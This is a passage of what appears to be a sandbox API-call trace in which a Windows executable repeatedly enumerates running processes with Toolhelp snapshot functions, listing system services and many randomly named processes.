lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.134] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.227] CloseHandle (hObject=0xc4) returned 1 [0112.227] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0112.231] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0112.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0112.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0112.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, 